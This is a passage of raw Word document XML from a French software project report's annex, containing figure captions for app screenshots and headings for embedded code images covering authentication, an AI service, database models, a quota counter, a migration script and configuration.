                  <pic:blipFill>
                    <a:blip r:embed="rId40"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4320000" cy="3975236"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
      <w:r>
        <w:t>Capture C-03 — inscription (/register).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4500000" cy="3460701"/>
            <wp:docPr id="23" name="Picture 23"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="C-04-mot-de-passe-oublie.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4500000" cy="3460701"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
      <w:r>
        <w:t>Capture C-04 — mot de passe oublié (/forgot-password).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="3960000" cy="4146747"/>
            <wp:docPr id="24" name="Picture 24"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="C-05-tableau-de-bord.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3960000" cy="4146747"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
      <w:r>
        <w:t>Capture C-05 — tableau de bord (/dashboard).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4500000" cy="3460701"/>
            <wp:docPr id="25" name="Picture 25"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="C-06-liste-documents.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4500000" cy="3460701"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
      <w:r>
        <w:t>Capture C-06 — liste des documents (/documents).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4500000" cy="3460701"/>
            <wp:docPr id="26" name="Picture 26"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="C-07-nouveau-document.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4500000" cy="3460701"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
      <w:r>
        <w:t>Capture C-07 — nouveau document (/documents/nouveau).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF1C178" w14:textId="170FDB5D" w:rsidR="003A2DEC" w:rsidRDefault="00690DDD" w:rsidP="003A2DEC">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc198828323"/>
      <w:r>
        <w:t>Le</w:t>
      </w:r>
      <w:r w:rsidR="003A2DEC">
        <w:t xml:space="preserve"> code de composants métier les plus significatifs</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidR="003A2DEC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Fichier</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">backend/app/services/auth_service.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>— composant métier le plus sensible du projet. Les fonctions de hachage de mot de passe, le cycle de vie des jetons et la rotation des refresh tokens y sont réunis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="80" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4527015" cy="6397914"/>
            <wp:docPr id="64" name="Picture 64"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="675dcc0d9e1b-0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId78"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4527015" cy="6397914"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4623495" cy="6398372"/>
            <wp:docPr id="65" name="Picture 65"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="675dcc0d9e1b-1.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId79"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4623495" cy="6398372"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Fichier</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">backend/app/services/ia_service.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— construction des prompts et appel au moteur d'inférence local.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="80" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4478743" cy="5896878"/>
            <wp:docPr id="66" name="Picture 66"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="57740303416d-0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId80"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4478743" cy="5896878"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4333991" cy="5896150"/>
            <wp:docPr id="67" name="Picture 67"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="57740303416d-1.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId81"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4333991" cy="5896150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B980889" w14:textId="565F30FC" w:rsidR="003A2DEC" w:rsidRDefault="00690DDD" w:rsidP="003A2DEC">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc198828324"/>
      <w:r>
        <w:t>Le</w:t>
      </w:r>
      <w:r w:rsidR="003A2DEC">
        <w:t xml:space="preserve"> code de composants d’accès aux données les plus significatifs</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
      <w:r w:rsidR="003A2DEC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Modèles SQLAlchemy — backend/database/db.py (extrait)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="80" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4478743" cy="5796727"/>
            <wp:docPr id="68" name="Picture 68"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="9b702a919fcc-0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId82"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4478743" cy="5796727"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4913000" cy="5693795"/>
            <wp:docPr id="69" name="Picture 69"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="9b702a919fcc-1.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId83"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4913000" cy="5693795"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Les tables</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Dossier</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Consentement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">et</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">PasswordReset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">suivent exactement le même schéma de déclaration ; elles sont omises ici pour ne pas allonger l'annexe.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="149"/>
    <w:bookmarkStart w:id="150" w:name="X7f4e41ea6735955bf38266af1233f1ccfdaee68"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Comptage du quota IA sur fenêtre glissante — backend/app/routes/ia_route.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="80" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4768248" cy="1290232"/>
            <wp:docPr id="70" name="Picture 70"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="06dda4568a20-0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId84"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4768248" cy="1290232"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="150"/>
    <w:bookmarkStart w:id="151" w:name="Xfce21c87c8fcc2b35b1275a19d81452a011b660"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Script de modification de la base — backend/database/migration_durcissement.sql</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le script de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">création</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">complet (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">backend/database/schema_mysql.sql</w:t>
      </w:r>
      <w:r>
        <w:t>, sept tables, MySQL 8) est versionné dans le dépôt ; ses extraits significatifs figurent en § 5.5. Le script de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">migration</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>est reproduit ici intégralement, car l'ordre de ses opérations porte un raisonnement (§ 5.5).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="80" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4575286" cy="4394999"/>
            <wp:docPr id="71" name="Picture 71"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="5778c3842e65-0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId85"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4575286" cy="4394999"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1579EE44" w14:textId="6AFE7256" w:rsidR="00E93063" w:rsidRDefault="00690DDD" w:rsidP="003A2DEC">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc198828325"/>
      <w:r>
        <w:t>Le</w:t>
      </w:r>
      <w:r w:rsidR="003A2DEC">
        <w:t xml:space="preserve"> code d’autres composants</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Configuration — backend/app/config.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="80" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4141029" cy="4593579"/>
            <wp:docPr id="72" name="Picture 72"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="41fc829b03d9-0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId86"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4141029" cy="4593579"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="152"/>
    <w:bookmarkStart w:id="153" w:name="X90e9e025862eecf6a50b6e482e5a1555e338c27"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Décorateur d'authentification et gardes de blueprint</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="80" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="3465540" cy="1490383"/>
            <wp:docPr id="73" name="Picture 73"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="bc7bb9330e5a-0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId66"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3465540" cy="1490383"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="3465540" cy="1490383"/>
            <wp:docPr id="74" name="Picture 74"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="bc7bb9330e5a-0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId66"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3465540" cy="1490383"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="80" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="2066351" cy="587531"/>
            <wp:docPr id="75" name="Picture 75"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
